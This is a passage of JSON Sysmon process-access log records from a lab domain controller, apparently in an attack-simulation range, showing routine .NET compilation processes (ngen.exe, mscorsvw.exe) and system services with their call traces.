l+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.106\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001052C40C00}\r\nTargetProcessId: 3100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.106","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001052C40C00}","TargetProcessId":"3100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.106\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001052C40C00}\r\nTargetProcessId: 3100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.106","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001052C40C00}","TargetProcessId":"3100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.122\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001052C40C00}\r\nTargetProcessId: 3100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.122","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001052C40C00}","TargetProcessId":"3100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.137\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104BC70C00}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.137","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104BC70C00}","TargetProcessId":"792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.137\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104BC70C00}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.137","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104BC70C00}","TargetProcessId":"792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.137\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00104BC70C00}\r\nTargetProcessId: 792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.137","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00104BC70C00}","TargetProcessId":"792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.184\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010F1CA0C00}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.184","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010F1CA0C00}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
